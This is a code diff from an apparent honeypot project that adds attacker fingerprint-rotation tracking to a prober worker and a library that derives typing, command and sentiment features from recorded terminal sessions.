"tcpfp", "tcpfp",
@@ -586,6 +626,61 @@ async def prober_worker(
event_type, event_type,
) )
# Substrate-rotation detection (DEBT-032) — open a sync engine for
# the prober's lifetime; recorder closes a session per call so we
# never hold a connection across phase boundaries. Failure to
# connect is non-fatal: probes continue, rotation detection is
# silently disabled.
rotation_engine: Engine | None = None
record_rotation: RotationRecorderFn | None = None
try:
rotation_engine = _build_sync_engine()
except Exception as exc: # noqa: BLE001
logger.warning(
"prober: rotation-detection DB unavailable, "
"running with rotation detection disabled: %s", exc,
)
if rotation_engine is not None:
def _publish_rotation(event_type: str, payload: dict[str, Any]) -> None:
raw_publish(
_topics.attacker(_topics.ATTACKER_FINGERPRINT_ROTATED),
payload,
event_type,
)
def _syslog_rotation(event_type: str, payload: dict[str, Any]) -> None:
_write_event(
log_path, json_path,
"fingerprint_rotated",
target_ip=payload["attacker_ip"],
target_port=str(payload["port"]),
probe_type=payload["probe_type"],
old_hash=payload.get("old_hash") or "",
new_hash=payload["new_hash"],
rotation_count=str(payload["rotation_count"]),
msg=(
f"FP rotation {payload['attacker_ip']}:{payload['port']} "
f"{payload['probe_type']} {payload.get('old_hash')}"
f"{payload['new_hash']}"
),
)
def record_rotation(
ip: str, port: int, probe_type: ProbeType, new_hash: str,
) -> None:
with Session(rotation_engine) as session:
record_fingerprint(
session,
attacker_ip=ip,
port=port,
probe_type=probe_type,
new_hash=new_hash,
ts=datetime.now(timezone.utc),
publish_fn=_publish_rotation,
syslog_fn=_syslog_rotation,
)
shutdown = asyncio.Event() shutdown = asyncio.Event()
heartbeat_task = asyncio.create_task(run_health_heartbeat(bus, "prober")) heartbeat_task = asyncio.create_task(run_health_heartbeat(bus, "prober"))
control_task = asyncio.create_task( control_task = asyncio.create_task(
@@ -612,6 +707,7 @@ async def prober_worker(
jarm_ports, hassh_ports, tcp_ports, jarm_ports, hassh_ports, tcp_ports,
log_path, json_path, timeout, log_path, json_path, timeout,
_publish_attacker, _publish_attacker,
record_rotation,
) )
try: try:
@@ -626,3 +722,6 @@ async def prober_worker(
if bus is not None: if bus is not None:
with contextlib.suppress(Exception): with contextlib.suppress(Exception):
await bus.close() await bus.close()
if rotation_engine is not None:
with contextlib.suppress(Exception):
rotation_engine.dispose()

View File

@@ -0,0 +1,25 @@
"""BEHAVE-SHELL extraction engine — DECNET's official implementation.
Per ``development/BEHAVE-EXTRACTOR.md``: this package is a pure
library. Workers (``BEHAVE-INTEGRATION.md`` Phase 4) own I/O, bus
emission, and persistence. The engine just turns one PTY session into
``Iterable[Observation]``.
BEHAVE is the spec; DECNET is the engine.
"""
from __future__ import annotations
from decnet.profiler.behave_shell.extract import (
DEFAULT_SOURCE,
build_context,
extract_session,
)
# Phase H.5-pre: extractor is feature-complete (37/37 Tier-A primitives
# emit; calibration grid honest). The ``-pre`` suffix stays until
# ``BEHAVE-INTEGRATION.md`` Phase 4 lands the worker wiring + observations
# table writes + AttackerDetail panel; only then does H.5 proper drop the
# suffix and tag v0.
__version__ = "0.1.0-pre"
__all__ = ["DEFAULT_SOURCE", "build_context", "extract_session", "__version__"]

View File

@@ -0,0 +1,573 @@
"""SessionContext: precomputed bundle every feature function reads from.
A naïve engine re-walks the event stream once per primitive. We don't
do that — one walk over the events builds this context, every feature
reads from it. Adding a new feature is O(1) cost on the parse side.
Step 1 fills ``iats`` (inter-key intervals between input events) and
``paste_bursts`` (contiguous runs of paste-class events). Step 4
will fill ``commands`` / ``inter_cmd_iats`` / ``output_per_cmd``.
"""
from __future__ import annotations
import math
from dataclasses import dataclass, field
from typing import Iterable, Mapping
from decnet.profiler.behave_shell._intent import (
LEXEME_MAX_LEN,
NEGATIVE_LEXEMES,
OBSCENITY_LEXEMES,
POSITIVE_LEXEMES,
)
from decnet.profiler.behave_shell._parse import (
AsciinemaEvent,
Command,
PasteBurst,
PromptLine,
detect_error_in_output,
extract_prompt_lines,
hash_token,
strip_ansi,
)
from decnet.profiler.behave_shell._thresholds import (
IKI_THINK_MAX_S,
LAYOUT_BIGRAM_TOP_N,
PASTE_BURST_MAX_IAT_S,
PASTE_MIN_CHARS_PER_EVENT,
PROMPT_LINE_MAX_CHARS,
SHORTCUT_CTRL_BYTES,
)
@dataclass(frozen=True, slots=True)
class _LexCounters:
"""Lexical counters from the typed-text walk (G.0).
Internal to the ctx-builder; flattened onto SessionContext fields
in :func:`build_session_context`.
"""
obscenity_hits: int = 0
positive_lex_hits: int = 0
negative_lex_hits: int = 0
caps_run_max: int = 0
bang_run_max: int = 0
@dataclass(frozen=True, slots=True)
class SessionContext:
sid: str
source: str
evidence_ref: str
t_start: float
t_end: float
duration_s: float
input_events: tuple[AsciinemaEvent, ...] = field(default_factory=tuple)
output_events: tuple[AsciinemaEvent, ...] = field(default_factory=tuple)
# Step 1 derivations
iats: tuple[float, ...] = field(default_factory=tuple)
paste_bursts: tuple[PasteBurst, ...] = field(default_factory=tuple)
paste_event_count: int = 0
# Step 4 derivations — command segmentation
commands: tuple[Command, ...] = field(default_factory=tuple)
inter_cmd_iats: tuple[float, ...] = field(default_factory=tuple)
output_per_cmd: tuple[int, ...] = field(default_factory=tuple)
# Step B.1 derivations — typing bursts (IATs split at think-pauses)
typing_bursts: tuple[tuple[float, ...], ...] = field(default_factory=tuple)
# Step B.3 derivations — error-correction signals
backspace_count: int = 0
backspace_iats: tuple[float, ...] = field(default_factory=tuple)
kill_line_count: int = 0
# Step B.4 derivations — per-command intra-typing IATs
intra_command_iats: tuple[tuple[float, ...], ...] = field(default_factory=tuple)
# Step F.0 derivations — PS1 prompt lines detected in the output stream
prompt_lines: tuple[PromptLine, ...] = field(default_factory=tuple)
# Step F.4 derivations — typed-only character histograms for keyboard
# layout fingerprinting (PII boundary lifted by ANTI for Phase F).
typed_unigram_counts: Mapping[str, int] = field(default_factory=dict)
typed_bigram_counts: Mapping[str, int] = field(default_factory=dict)
typed_letter_count: int = 0
# Step G.0 derivations — lexical counters from the same single-pass
# typed-text walk. No raw text retained; only fixed-vocabulary
# membership counts and run-lengths. Drives valence (G.5), arousal
# (G.6), and frustration_venting (G.8).
obscenity_hits: int = 0
positive_lex_hits: int = 0
negative_lex_hits: int = 0
caps_run_max: int = 0
bang_run_max: int = 0
def _detect_paste_bursts(
inputs: list[AsciinemaEvent],
) -> tuple[tuple[PasteBurst, ...], int]:
"""Group consecutive paste-class input events into PasteBursts.
A paste-class event is one with ``len(data) >= PASTE_MIN_CHARS_PER_EVENT``.
Two adjacent paste-class events collapse into the same burst when
their IAT is within ``PASTE_BURST_MAX_IAT_S``; otherwise a new
burst opens. Returns the bursts and the total count of paste-class
events (the same number ``BEHAVE`` prototype calls ``paste_events``).
"""
bursts: list[PasteBurst] = []
paste_count = 0
cur_start: float | None = None
cur_end: float = 0.0
cur_chars: int = 0
cur_events: int = 0
last_t: float | None = None
def _close() -> None:
nonlocal cur_start, cur_end, cur_chars, cur_events
if cur_start is not None and cur_events > 0:
bursts.append(PasteBurst(
start_ts=cur_start,
end_ts=cur_end,
char_count=cur_chars,
event_count=cur_events,
))
cur_start = None
cur_end = 0.0
cur_chars = 0
cur_events = 0
for t, _kind, data in inputs:
is_paste = len(data) >= PASTE_MIN_CHARS_PER_EVENT
if is_paste:
paste_count += 1
if cur_start is None or (
last_t is not None and (t - last_t) > PASTE_BURST_MAX_IAT_S
):
_close()
cur_start = t
cur_end = t
cur_chars += len(data)
cur_events += 1
else:
_close()
last_t = t
_close()
return tuple(bursts), paste_count
_BACKSPACE_CHARS = ("\x7f", "\x08")
_KILL_LINE_CHARS = ("\x15", "\x17")
def _scan_correction_signals(
inputs: list[AsciinemaEvent],
) -> tuple[int, tuple[float, ...], int]:
"""Walk input events char-by-char, count backspaces / kill-lines /
timing IATs.
PII discipline: only counts and IATs leave this function — no
character data is retained or returned.
"""
backspace_count = 0
kill_line_count = 0
iats: list[float] = []
last_non_bs_t: float | None = None
for t, _kind, data in inputs:
for c in data:
if c in _BACKSPACE_CHARS:
backspace_count += 1
if last_non_bs_t is not None:
iats.append(max(0.0, t - last_non_bs_t))
elif c in _KILL_LINE_CHARS:
kill_line_count += 1
last_non_bs_t = t
else:
last_non_bs_t = t
return backspace_count, tuple(iats), kill_line_count
def _split_typing_bursts(iats: tuple[float, ...]) -> tuple[tuple[float, ...], ...]:
"""Split a flat IAT sequence at gaps > IKI_THINK_MAX_S.
Drops bursts of fewer than 3 IATs — too short to compute a stable
CV. Mirrors BEHAVE prototype's ``_split_into_bursts``.
"""
bursts: list[list[float]] = [[]]
for x in iats:
if x > IKI_THINK_MAX_S:
if bursts[-1]:
bursts.append([])
else:
bursts[-1].append(x)
return tuple(tuple(b) for b in bursts if len(b) >= 3)
def _segment_commands(inputs: list[AsciinemaEvent]) -> tuple[Command, ...]:
"""Walk input events, splitting on ``\\r`` / ``\\n`` into commands.
Retains only the first whitespace-delimited token as a sha256 hash
plus three integer counters needed for the Phase C
``motor.shell_mastery.*`` primitives:
* ``tab_count`` — ``\\t`` (0x09) keystrokes in the command
* ``shortcut_count`` — readline control bytes from
:data:`SHORTCUT_CTRL_BYTES`
* ``pipe_count`` — ``|`` characters in the command (counted on
every byte; pasted pipelines still indicate pipeline fluency the
operator chose to execute)
Buffer contents are dropped on every command boundary; an
unterminated trailing buffer (no final newline) yields no command.
"""
cmds: list[Command] = []
buf_chars: list[str] = []
buf_start_ts: float | None = None
tab_count = 0
shortcut_count = 0
pipe_count = 0
for t, _kind, data in inputs:
for c in data:
if c in ("\r", "\n"):
if buf_chars:
text = "".join(buf_chars).strip()
first_token = text.split(maxsplit=1)[0] if text else ""
cmds.append(Command(
start_ts=buf_start_ts if buf_start_ts is not None else t,
end_ts=t,
first_token_hash=hash_token(first_token),
tab_count=tab_count,
shortcut_count=shortcut_count,
pipe_count=pipe_count,
))
buf_chars = []
buf_start_ts = None
tab_count = 0
shortcut_count = 0
pipe_count = 0
else:
if not buf_chars:
buf_start_ts = t
buf_chars.append(c)
if c == "\t":
tab_count += 1
elif c == "|":
pipe_count += 1
elif c in SHORTCUT_CTRL_BYTES:
shortcut_count += 1
return tuple(cmds)
def _annotate_commands_with_output(
commands: tuple[Command, ...],
outputs: list[AsciinemaEvent],
) -> tuple[tuple[Command, ...], tuple[PromptLine, ...]]:
"""Re-emit ``commands`` with output-derived fields filled.
Returns ``(commands, prompt_lines)``. Each ``Command`` gains
``errored``, ``output_bytes``, and ``followed_by_prompt`` (Step
F.0). The flattened tuple of all detected ``PromptLine`` instances
across every command's window is returned alongside for the caller
to install on ``SessionContext.prompt_lines``.
The output window for ``commands[i]`` spans from its ``end_ts``
(the ``\\r``/``\\n`` that ran it) to the ``start_ts`` of the next
command. The last command's window is open-ended (``math.inf``)
so output events arriving at or after ``t_end`` are still captured.
"""
if not commands:
return commands, ()
annotated: list[Command] = []
all_prompts: list[PromptLine] = []
for i, cmd in enumerate(commands):
win_end = commands[i + 1].start_ts if i + 1 < len(commands) else math.inf
byte_count, errored, prompts = _output_window(outputs, cmd.end_ts, win_end)
all_prompts.extend(prompts)
annotated.append(Command(
start_ts=cmd.start_ts,
end_ts=cmd.end_ts,
first_token_hash=cmd.first_token_hash,
tab_count=cmd.tab_count,
shortcut_count=cmd.shortcut_count,
pipe_count=cmd.pipe_count,
errored=errored,
output_bytes=byte_count,
followed_by_prompt=bool(prompts),
))
return tuple(annotated), tuple(all_prompts)
def _per_command_iats(
commands: tuple[Command, ...],
inputs: list[AsciinemaEvent],
) -> tuple[tuple[float, ...], ...]:
"""Per-command IATs between consecutive input events whose
timestamps fall in ``[cmd.start_ts, cmd.end_ts)``.
Excludes the terminator IAT (the last event at ``cmd.end_ts`` is
the ``\\r``/``\\n`` itself). Returns one tuple per command.
"""
out: list[tuple[float, ...]] = []
for cmd in commands:
prev_t: float | None = None
cmd_iats: list[float] = []
for t, _kind, _data in inputs:
if t < cmd.start_ts or t >= cmd.end_ts:
continue
if prev_t is not None:
cmd_iats.append(max(0.0, t - prev_t))
prev_t = t
out.append(tuple(cmd_iats))
return tuple(out)
def _output_bytes_between(
outputs: list[AsciinemaEvent],
start: float,
end: float,
) -> int:
"""Total ``len(d)`` of output events with ``start <= t < end``."""
return sum(len(d) for t, _k, d in outputs if start <= t < end)
def _typed_char_histograms(
inputs: list[AsciinemaEvent],
) -> tuple[Mapping[str, int], Mapping[str, int], int, _LexCounters]:
"""Walk input events, build typed-only unigram + bigram histograms
plus the Phase G lexical counters.
Skip paste-class events (``len(data) >= PASTE_MIN_CHARS_PER_EVENT``)
— pasted text reveals nothing about the operator's keyboard or
sentiment. Letter bigrams chain only across consecutive ASCII-letter
chars; a digit or punctuation character breaks the chain.
Lexical counters (G.0): a small word buffer (≤ ``LEXEME_MAX_LEN``)
accumulates ASCII-letter chars (case-folded). On any non-letter
boundary, every suffix of the buffer is checked against
``POSITIVE_LEXEMES`` / ``NEGATIVE_LEXEMES`` / ``OBSCENITY_LEXEMES``;
the longest match wins (so ``fucking`` counts as one obscenity hit,
not two — ``fuck`` + ``fucking``). Caps and bang runs are tracked
in the same walk.
Returns ``(unigrams, bigrams, total_letters, lex_counters)``.
"""
unigrams: dict[str, int] = {}
bigrams: dict[str, int] = {}
total_letters = 0
last_letter: str | None = None
word_buf: list[str] = []
obscenity_hits = 0
positive_lex_hits = 0
negative_lex_hits = 0
caps_run_cur = 0
caps_run_max = 0
bang_run_cur = 0
bang_run_max = 0
def _flush_word() -> tuple[int, int, int]:
"""Match longest lexeme suffix in ``word_buf``; return per-set deltas."""
if not word_buf:
return 0, 0, 0
s = "".join(word_buf)
# Longest-suffix scan against fixed lexicons.
for length in range(min(len(s), LEXEME_MAX_LEN), 0, -1):
suffix = s[-length:]
if suffix in OBSCENITY_LEXEMES:
return 1, 0, 0
if suffix in POSITIVE_LEXEMES:
return 0, 1, 0
if suffix in NEGATIVE_LEXEMES:
return 0, 0, 1
return 0, 0, 0
for _t, _kind, data in inputs:
if len(data) >= PASTE_MIN_CHARS_PER_EVENT:
# Paste boundary breaks every running counter.
last_letter = None
obs_d, pos_d, neg_d = _flush_word()
obscenity_hits += obs_d
positive_lex_hits += pos_d
negative_lex_hits += neg_d
word_buf.clear()
caps_run_cur = 0
bang_run_cur = 0
continue
for c in data:
# Caps-run tracking
if c.isascii() and c.isupper():
caps_run_cur += 1
if caps_run_cur > caps_run_max:
caps_run_max = caps_run_cur
else:
caps_run_cur = 0
# Bang-run tracking
if c == "!":
bang_run_cur += 1
if bang_run_cur > bang_run_max:
bang_run_max = bang_run_cur
else:
bang_run_cur = 0
# Histogram + lexeme buffering
if c.isascii() and c.isalpha():
lower = c.lower()
unigrams[lower] = unigrams.get(lower, 0) + 1
total_letters += 1
if last_letter is not None:
big = last_letter + lower
bigrams[big] = bigrams.get(big, 0) + 1
last_letter = lower
word_buf.append(lower)
if len(word_buf) > LEXEME_MAX_LEN:
# Slide window — only the tail can match a lexeme.
word_buf[:] = word_buf[-LEXEME_MAX_LEN:]
else:
last_letter = None
obs_d, pos_d, neg_d = _flush_word()
obscenity_hits += obs_d
positive_lex_hits += pos_d
negative_lex_hits += neg_d
word_buf.clear()
# Trailing word (no boundary at end of input).
obs_d, pos_d, neg_d = _flush_word()
obscenity_hits += obs_d
positive_lex_hits += pos_d
negative_lex_hits += neg_d
if len(bigrams) > LAYOUT_BIGRAM_TOP_N:
top = sorted(bigrams.items(), key=lambda kv: -kv[1])[:LAYOUT_BIGRAM_TOP_N]
bigrams = dict(top)
return unigrams, bigrams, total_letters, _LexCounters(
obscenity_hits=obscenity_hits,
positive_lex_hits=positive_lex_hits,
negative_lex_hits=negative_lex_hits,
caps_run_max=caps_run_max,
bang_run_max=bang_run_max,
)
def _output_window(
outputs: list[AsciinemaEvent],
start: float,
end: float,
) -> tuple[int, bool, tuple[PromptLine, ...]]:
"""Walk output events in ``[start, end)`` once.
Returns ``(byte_count, errored, prompt_lines)``. ``byte_count`` is
the raw byte count (pre-strip); ``errored`` is the canonical-error
-pattern match over the ANSI-stripped concatenation;
``prompt_lines`` is the tuple of PS1 lines detected in the same
stripped text (Step F.0).
PII trade-off (Phase F): the stripped text itself is dropped on
return, but ``prompt_lines`` retains PS1 strings (capped at
``PROMPT_LINE_MAX_CHARS``). Only derived values leave the engine
via observations; the prompt strings live on ``SessionContext``
so F.1 / F.3 / E.4 can read them.
"""
chunks: list[str] = []
last_ts = start
byte_count = 0
for t, _k, d in outputs:
if start <= t < end:
byte_count += len(d)
chunks.append(d)
last_ts = t
if not chunks:
return 0, False, ()
stripped = strip_ansi("".join(chunks))
errored = detect_error_in_output(stripped)
prompts = tuple(extract_prompt_lines(
stripped, base_ts=last_ts, max_chars=PROMPT_LINE_MAX_CHARS,
))
return byte_count, errored, prompts
def build_session_context(
events: Iterable[AsciinemaEvent],
*,
sid: str,
source: str,
evidence_ref: str | None = None,
) -> SessionContext:
"""Single-pass build of the SessionContext for ``events``."""
inputs: list[AsciinemaEvent] = []
outputs: list[AsciinemaEvent] = []
t_first: float | None = None
t_last: float = 0.0
for ev in events:
t, kind, _ = ev
if t_first is None:
t_first = t
if t > t_last:
t_last = t
if kind == "i":
inputs.append(ev)
elif kind == "o":
outputs.append(ev)
if t_first is None:
t_start = 0.0
t_end = 0.0
else:
t_start = t_first
t_end = t_last
iats: tuple[float, ...] = tuple(
max(0.0, inputs[i][0] - inputs[i - 1][0]) for i in range(1, len(inputs))
)
paste_bursts, paste_count = _detect_paste_bursts(inputs)
typing_bursts = _split_typing_bursts(iats)
backspace_count, backspace_iats, kill_line_count = _scan_correction_signals(inputs)
commands = _segment_commands(inputs)
commands, prompt_lines = _annotate_commands_with_output(commands, outputs)
inter_cmd_iats = tuple(
max(0.0, commands[i + 1].start_ts - commands[i].end_ts)
for i in range(len(commands) - 1)
)
output_per_cmd = tuple(
_output_bytes_between(outputs, commands[i].end_ts, commands[i + 1].start_ts)
for i in range(len(commands) - 1)
)
intra_command_iats = _per_command_iats(commands, inputs)
typed_uni, typed_bi, typed_letters, lex = _typed_char_histograms(inputs)
return SessionContext(
sid=sid,
source=source,
evidence_ref=evidence_ref or f"session:{sid}",
t_start=t_start,
t_end=t_end,
duration_s=max(0.0, t_end - t_start),
input_events=tuple(inputs),
output_events=tuple(outputs),
iats=iats,
paste_bursts=paste_bursts,
paste_event_count=paste_count,
commands=commands,
inter_cmd_iats=inter_cmd_iats,
output_per_cmd=output_per_cmd,
typing_bursts=typing_bursts,
backspace_count=backspace_count,
backspace_iats=backspace_iats,
kill_line_count=kill_line_count,
intra_command_iats=intra_command_iats,
prompt_lines=prompt_lines,
typed_unigram_counts=typed_uni,
typed_bigram_counts=typed_bi,
typed_letter_count=typed_letters,
obscenity_hits=lex.obscenity_hits,
positive_lex_hits=lex.positive_lex_hits,
negative_lex_hits=lex.negative_lex_hits,
caps_run_max=lex.caps_run_max,
bang_run_max=lex.bang_run_max,
)

View File

@@ -0,0 +1,104 @@
"""Registered feature functions.
Each entry takes a ``SessionContext`` and yields zero or more
``Observation`` instances. Adding a primitive = adding a function in a
sibling module and appending it to ``FEATURES``.
"""
from __future__ import annotations
from typing import Callable, Iterable
from behave_core.spec.envelope import Observation
from decnet.profiler.behave_shell._ctx import SessionContext
from decnet.profiler.behave_shell._features.cognitive import (
cognitive_load,
command_branch_diversity,
error_resilience_fallback_to_man,
error_resilience_frustration_typing,
error_resilience_retry_tactic,
exploration_style,
feedback_loop_engagement,
planning_depth,
tool_vocabulary,
inter_command_consistency,
inter_command_latency_class,
)
from decnet.profiler.behave_shell._features.emotional_valence import (
arousal,
frustration_venting,
stress_response,
valence,
)
from decnet.profiler.behave_shell._features.environmental import (
keyboard_layout,
locale,
numpad_usage,
shell_type,
terminal_multiplexer,
)
from decnet.profiler.behave_shell._features.operational import (
cleanup_behavior,
multi_actor_indicators,
objective,
opsec_discipline,
)
from decnet.profiler.behave_shell._features.temporal import (
escalation_pattern,
exit_behavior,
landing_ritual,
session_duration,
)
from decnet.profiler.behave_shell._features.motor import (
command_chunking,
error_correction,
input_modality,
keystroke_cadence,
motor_stability,
paste_burst_rate,
pipe_chaining_depth,
shortcut_usage,
tab_completion,
)
FeatureFn = Callable[[SessionContext], Iterable[Observation]]
FEATURES: tuple[FeatureFn, ...] = (
input_modality,
paste_burst_rate,
keystroke_cadence,
motor_stability,
error_correction,
command_chunking,
tab_completion,
shortcut_usage,
pipe_chaining_depth,
inter_command_latency_class,
command_branch_diversity,
feedback_loop_engagement,
inter_command_consistency,
cognitive_load,
exploration_style,
planning_depth,
tool_vocabulary,
error_resilience_retry_tactic,
error_resilience_frustration_typing,
error_resilience_fallback_to_man,
session_duration,
escalation_pattern,
landing_ritual,
exit_behavior,
shell_type,
terminal_multiplexer,
locale,
keyboard_layout,
numpad_usage,
objective,
opsec_discipline,
cleanup_behavior,
multi_actor_indicators,
valence,
arousal,
stress_response,
frustration_venting,
)

View File

@@ -0,0 +1,32 @@
"""Helper for building registry-valid :class:`Observation` records.
Every feature module would otherwise repeat the same Window /
source / evidence_ref boilerplate. This helper centralises it and is
the one place to reach when emission semantics change (e.g. when we
start parametrising windows on a per-primitive basis).
"""
from __future__ import annotations
from typing import Any
from behave_core.spec.envelope import Observation, Window
from decnet.profiler.behave_shell._ctx import SessionContext
def make_observation(
ctx: SessionContext,
*,
primitive: str,
value: Any,
confidence: float,
) -> Observation:
"""Build one :class:`Observation` for the whole-session window."""
return Observation(
primitive=primitive,
value=value,
confidence=confidence,
window=Window(start_ts=ctx.t_start, end_ts=ctx.t_end),
source=ctx.source,
evidence_ref=ctx.evidence_ref,
)

View File

@@ -0,0 +1,593 @@
"""``cognitive.*`` feature functions.
Step 5: ``cognitive.inter_command_latency_class``.
Step 6: ``cognitive.command_branch_diversity``.
Step 7: ``cognitive.feedback_loop_engagement``.
Step 8: ``cognitive.inter_command_consistency``.
Step D.1: ``cognitive.cognitive_load``.
"""
from __future__ import annotations
import statistics
from typing import Iterator
from behave_core.spec.envelope import Observation
from decnet.profiler.behave_shell._ctx import SessionContext
from decnet.profiler.behave_shell._features._emit import make_observation
from decnet.profiler.behave_shell._parse import hash_token
from decnet.profiler.behave_shell._thresholds import (
BRANCH_DIVERSITY_LINEAR_MIN,
COGNITIVE_LOAD_CHUNKING_REF_CV,
COGNITIVE_LOAD_LOW_MAX,
COGNITIVE_LOAD_MEDIUM_MAX,
COGNITIVE_LOAD_PACE_REF_CV,
EXPLORATION_CHAOTIC_BACKTRACK_MIN,
EXPLORATION_TARGETED_REP_MIN,
FEEDBACK_CORRELATION_MIN,
FEEDBACK_MIN_PAIRS,
FRUSTRATION_LOW_MAX,
FRUSTRATION_MODERATE_MAX,
IKI_THINK_MAX_S,
INTER_CMD_DELIBERATE_MAX,
INTER_CMD_INSTANT_MAX,
INTER_CMD_LLM_HEAVYWEIGHT_MAX,
INTER_CMD_LLM_LIGHTWEIGHT_MAX,
INTER_CMD_TYPING_MAX,
MIN_COMMANDS_FOR_FULL_CONFIDENCE,
PAUSE_CV_BIMODAL_MIN,
PAUSE_CV_METRONOMIC_MAX,
PLANNING_DEEP_MIN,
PLANNING_REACTIVE_MIN,
TOOL_VOCAB_BROAD_MIN,
TOOL_VOCAB_NARROW_MAX,
)
# Precomputed at import time so the per-session hot loop is a set
# membership check, not 3 sha256 ops per command. The ``--help`` /
# ``-h`` flag forms can't be detected here — they're not first tokens
# (PII discipline keeps only the *first* token's hash). v0.2 will
# reconsider once corpus calibration justifies storing arg-token
# hashes too.
_HELP_FAMILY_HASHES: frozenset[str] = frozenset({
hash_token("man"),
hash_token("help"),
hash_token("info"),
})
def _clip01(x: float) -> float:
if x < 0.0:
return 0.0
if x > 1.0:
return 1.0
return x
def _cv(xs: tuple[float, ...] | list[float]) -> float | None:
"""Coefficient of variation; ``None`` if undefined (n<2 or mean==0)."""
if len(xs) < 2:
return None
mean = statistics.fmean(xs)
if mean <= 0.0:
return None
return statistics.stdev(xs) / mean
def _bucket_inter_cmd_latency(median_iat: float) -> str:
if median_iat <= INTER_CMD_INSTANT_MAX:
return "instant"
if median_iat <= INTER_CMD_TYPING_MAX:
return "typing_speed"
if median_iat <= INTER_CMD_DELIBERATE_MAX:
return "deliberate"
if median_iat <= INTER_CMD_LLM_LIGHTWEIGHT_MAX:
return "llm_lightweight"
if median_iat <= INTER_CMD_LLM_HEAVYWEIGHT_MAX:
return "llm_heavyweight"
return "long"
def inter_command_latency_class(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``cognitive.inter_command_latency_class``.
Operator's *thinking pace* between commands, bucketed against
calibrated thresholds. Splits LW-sim / CLAUDE-FF / CLAUDE-CL.
"""
if not ctx.inter_cmd_iats:
return
median_iat = statistics.median(ctx.inter_cmd_iats)
bucket = _bucket_inter_cmd_latency(median_iat)
# Sample-size honesty: < 5 commands → halve confidence
if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
confidence = 0.40
else:
confidence = 0.80
yield make_observation(
ctx,
primitive="cognitive.inter_command_latency_class",
value=bucket,
confidence=confidence,
)
def command_branch_diversity(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``cognitive.command_branch_diversity``.
Content-based discriminator (no timing): unique first-token ratio
over total commands. Splits CLAUDE-FF (linear_playbook) from
CLAUDE-CL (adaptive_branching). The empirical anchor on
2026-05-02: fire-and-forget runs ~10 distinct tools; closed-loop
runs 5-6 with ``curl`` re-invoked as the operator chases threads.
"""
n = len(ctx.commands)
if n == 0:
# No commands at all → nothing honest to say. Skip emission.
return
if n < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
# Registry admits "unknown"; absence of *enough* data is itself
# a high-confidence answer.
yield make_observation(
ctx,
primitive="cognitive.command_branch_diversity",
value="unknown",
confidence=1.0,
)
return
unique = len({c.first_token_hash for c in ctx.commands})
ratio = unique / n
if ratio >= BRANCH_DIVERSITY_LINEAR_MIN:
value = "linear_playbook"
else:
# Anything below the linear floor is treated as adaptive — the
# operator is reusing tools, the discriminative signal we
# actually want.
value = "adaptive_branching"
yield make_observation(
ctx,
primitive="cognitive.command_branch_diversity",
value=value,
confidence=0.80,
)
def feedback_loop_engagement(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``cognitive.feedback_loop_engagement``.
Pearson correlation between ``output_per_cmd[i]`` (bytes the
operator saw before the next command) and
``inter_cmd_iats[i]`` (the pause that followed). closed_loop
operators read more before pausing more; fire_and_forget operators
pace independently of output. CUTS ACROSS the LLM/human axis —
closed-loop LLMs and reading humans both score closed_loop.
First primitive that depends on output events: zero output events
in the shard → emit ``unknown`` at confidence 1.0 (no honest
correlation possible) and exit.
"""
pairs = list(zip(ctx.output_per_cmd, ctx.inter_cmd_iats))
if not ctx.output_events or len(pairs) < FEEDBACK_MIN_PAIRS:
if not ctx.commands:
return
yield make_observation(
ctx,
primitive="cognitive.feedback_loop_engagement",
value="unknown",
confidence=1.0,
)
return
xs = [float(p[0]) for p in pairs]
ys = [float(p[1]) for p in pairs]
try:
r = statistics.correlation(xs, ys)
except statistics.StatisticsError:
# Constant series on either axis — correlation undefined.
yield make_observation(
ctx,
primitive="cognitive.feedback_loop_engagement",
value="unknown",
confidence=1.0,
)
return
if r > FEEDBACK_CORRELATION_MIN:
value = "closed_loop"
else:
value = "fire_and_forget"
yield make_observation(
ctx,
primitive="cognitive.feedback_loop_engagement",
value=value,
confidence=0.75,
)
def error_resilience_fallback_to_man(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``cognitive.error_resilience.fallback_to_man``.
For each errored command, check whether the operator's next
command is ``man`` / ``help`` / ``info`` — i.e. they reached for
the manual rather than re-trying or pivoting. If at least one
errored command triggered this fallback → ``present``; otherwise
``absent``.
Skip emission when no commands errored — the registry's binary
has no ``unknown``, and emitting ``absent`` from no observation
at all would be dishonest.
The ``--help`` / ``-h`` flag forms can't fire this primitive in
v0.1: they aren't first tokens, and the engine only retains
``first_token_hash`` per command (PII discipline). Filed for v0.2.
"""
errored_indices = [i for i, c in enumerate(ctx.commands) if c.errored]
if not errored_indices:
return
fallback_count = 0
for i in errored_indices:
if i + 1 >= len(ctx.commands):
continue
if ctx.commands[i + 1].first_token_hash in _HELP_FAMILY_HASHES:
fallback_count += 1
value = "present" if fallback_count > 0 else "absent"
if len(errored_indices) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
confidence = 0.40
else:
confidence = 0.65
yield make_observation(
ctx,
primitive="cognitive.error_resilience.fallback_to_man",
value=value,
confidence=confidence,
)
def error_resilience_frustration_typing(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``cognitive.error_resilience.frustration_typing``.
Compares median within-command IAT for commands *following* an
errored command against the same statistic for commands following
a successful command. A large relative delta indicates the operator
typed differently after a failure — speed-up (rage / fluency) or
slowdown (caution); both are signs of arousal.
Skip emission when either group is empty (no errors, or every
command errored — no clean baseline). Sample-size honesty drops
confidence below the floor.
"""
post_err: list[float] = []
post_ok: list[float] = []
cmds = ctx.commands
intra = ctx.intra_command_iats
if len(cmds) < 2 or len(intra) != len(cmds):
return
for i in range(1, len(cmds)):
cmd_iats = intra[i]
if not cmd_iats:
continue
m = statistics.median(cmd_iats)
if cmds[i - 1].errored:
post_err.append(m)
else:
post_ok.append(m)
if not post_err or not post_ok:
return
median_err = statistics.median(post_err)
median_ok = statistics.median(post_ok)
if median_ok <= 0.0:
return
delta = abs(median_err - median_ok) / median_ok
if delta < FRUSTRATION_LOW_MAX:
value = "low"
elif delta < FRUSTRATION_MODERATE_MAX:
value = "moderate"
else:
value = "high"
if len(post_err) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
confidence = 0.40
else:
confidence = 0.60
yield make_observation(
ctx,
primitive="cognitive.error_resilience.frustration_typing",
value=value,
confidence=confidence,
)
